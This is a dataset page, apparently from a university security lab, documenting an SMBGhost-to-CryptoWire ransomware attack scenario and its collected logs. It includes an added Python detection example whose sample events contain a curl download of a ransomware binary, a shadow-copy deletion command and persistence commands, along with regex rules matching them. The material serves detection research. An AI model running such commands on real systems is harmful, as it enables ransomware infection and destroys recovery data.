  • T9-24-01-M-NE-CLM
  • SMBGhost + Ransomware

    This attack chains T2-24-01-S-N-CL and T4-24-01-S-E-M. Three logs were collected: two pcap files and one evtx file.

    1. Reverse shell connection by exploiting the SMBGhost vulnerability
    2. Download the ransomware and register it in the registry
    3. Execute the ransomware; the infection completes after the victim PC reboots

    The attacker obtains a reverse shell through the Windows 10 SMBv3 vulnerability SMBGhost (CVE-2020-0796) [1][2], as in T2-24-01-S-N-CL. Using curl commands, the attacker then downloads and executes the CryptoWire ransomware [3][5], as in T4-24-01-S-E-M. Besides encrypting the home directory, the ransomware deletes Volume Shadow Copies, registers a scheduled task, and demands a ransom for decryption.
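    The behaviours above map to a small set of network and host observables. The Python below is an added example, not code from this dataset page, its run.py, or the cited POC: it checks a captured SMB2 compression transform header for the 32-bit overflow of OriginalCompressedSegmentSize + Offset that CVE-2020-0796 abuses in srv2.sys, and matches Sysmon-style process-creation and registry events against the ransomware behaviours named on this page (curl download, Run-key registration, shadow copy deletion, scheduled task), mapping each to its ATT&CK technique ID. The sample headers, events, file names and URL are constructed for the example; the field names follow Sysmon event IDs 1 and 13, and the technique IDs are the standard ATT&CK ones.

```python
"""Added example: detection heuristics for the SMBGhost + CryptoWire scenario,
run over constructed sample data (no packet capture or evtx parsing included)."""
import re
import struct
from typing import List, Optional, Tuple

# --- 1. SMBGhost (CVE-2020-0796) header check ---------------------------------
# SMB2 COMPRESSION_TRANSFORM_HEADER (MS-SMB2 2.2.42), little-endian, 16 bytes:
# ProtocolId (4) | OriginalCompressedSegmentSize (4) | CompressionAlgorithm (2)
# | Flags (2) | Offset/Length (4)
SMB2_COMPRESSION_PROTOCOL_ID = b"\xfcSMB"
COMPRESSION_HEADER_FMT = "<4sIHHI"
COMPRESSION_HEADER_LEN = struct.calcsize(COMPRESSION_HEADER_FMT)


def check_compression_header(payload: bytes) -> Optional[str]:
    """Return a reason string if the header looks like a CVE-2020-0796 trigger,
    or None for a well-formed compression header or non-SMB data."""
    if len(payload) < COMPRESSION_HEADER_LEN:
        return None
    proto, orig_size, _algo, _flags, offset = struct.unpack(
        COMPRESSION_HEADER_FMT, payload[:COMPRESSION_HEADER_LEN]
    )
    if proto != SMB2_COMPRESSION_PROTOCOL_ID:
        return None
    # Unpatched srv2.sys added these two ULONGs without an overflow check and
    # used the wrapped result as the size of the decompression buffer.
    if orig_size + offset > 0xFFFFFFFF:
        return "OriginalCompressedSegmentSize + Offset overflows 32 bits"
    if offset > len(payload) - COMPRESSION_HEADER_LEN:
        return "Offset points past the captured payload"
    return None


# --- 2. Host-side behaviour matching ------------------------------------------
# (ATT&CK technique, Sysmon event ID, field to inspect, regex over the lower-cased field)
HOST_RULES = [
    ("T1105 Ingress Tool Transfer", 1, "CommandLine",
     re.compile(r"\bcurl(\.exe)?\b.*https?://")),
    ("T1547.001 Registry Run Keys", 13, "TargetObject",
     re.compile(r"\\currentversion\\run\\")),
    ("T1490 Inhibit System Recovery", 1, "CommandLine",
     re.compile(r"vssadmin(\.exe)?\s.*delete\s+shadows|wmic(\.exe)?\s.*shadowcopy\s+delete")),
    ("T1053.005 Scheduled Task", 1, "CommandLine",
     re.compile(r"schtasks(\.exe)?\s.*/create")),
]


def match_host_events(events: List[dict]) -> List[Tuple[int, str]]:
    """Return (event index, technique) for every rule an event matches, in event order."""
    hits: List[Tuple[int, str]] = []
    for idx, ev in enumerate(events):
        for technique, event_id, field, pattern in HOST_RULES:
            if ev.get("EventID") == event_id and pattern.search(ev.get(field, "").lower()):
                hits.append((idx, technique))
    return hits


# Constructed sample events; paths, task name and download URL are invented for the example.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl http://192.168.56.1/cw.exe -o C:\Users\victim\cw.exe"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cw",
     "Details": r"C:\Users\victim\cw.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /tn cw /tr C:\Users\victim\cw.exe /sc onlogon"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

# Constructed SMB2 compression headers: a benign one and one whose size sum wraps.
BENIGN_HEADER = struct.pack(COMPRESSION_HEADER_FMT, SMB2_COMPRESSION_PROTOCOL_ID,
                            64, 1, 0, 0) + b"\x00" * 64
OVERFLOW_HEADER = struct.pack(COMPRESSION_HEADER_FMT, SMB2_COMPRESSION_PROTOCOL_ID,
                              0xFFFFFFFF, 1, 0, 0x10) + b"\x00" * 16

if __name__ == "__main__":
    for name, hdr in (("benign", BENIGN_HEADER), ("overflow", OVERFLOW_HEADER)):
        print(f"{name}: {check_compression_header(hdr)}")
    for idx, technique in match_host_events(SAMPLE_EVENTS):
        print(f"event {idx}: {technique}")
```

    To run this against the dataset's own logs you would feed each TCP/445 payload from the pcap files to check_compression_header and convert the evtx records to dicts with the same field names; neither the pcap reader nor the evtx conversion is part of this example. The host rules are deliberately narrow string matches on the commands the page names, so they are a starting point for labelling, not a complete detector.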
  • Environment
              OS                 IP                          Software   Log collection time   Program runtime
    Attacker  Windows 11         192.168.56.1                -          160 sec               200 sec
    Victim    Windows 10 (1903)  192.168.56.112 (Internal)   SMB
                                 10.0.3.15 (External)

  • Installing
  • python3 -m pip install -r requirements.txt

  • Using
  • python3 run.py

  • MITRE ATT&CK Framework
  • Attack Tactic
    Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion,
    Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact

  • Logs
  • ./log/2024_01_T9_{time}.evtx # YYmmdd_HHMMSS
    ./log/2024_01_T9_{time}_1.pcap # YYmmdd_HHMMSS
    ./log/2024_01_T9_{time}_2.pcap # YYmmdd_HHMMSS



  • References
  • [1] NIST [CVE-2020-0796]
    [2] ZecOps [CVE-2020-0796 Remote Code Execution POC]
    [3] Ahnlab ASEC [CryptoWire with Decryption Key Included]
    [4] VirusTotal [bcf4ad8687af0d79971e5f73ab152b7732bf3540726f71654da87f36e54cff6f]
    [5] GitHub [CryptoWire Open Source]

  • Copyright (C) 2024, KAIST Cyber Security Research Center. All Rights Reserved.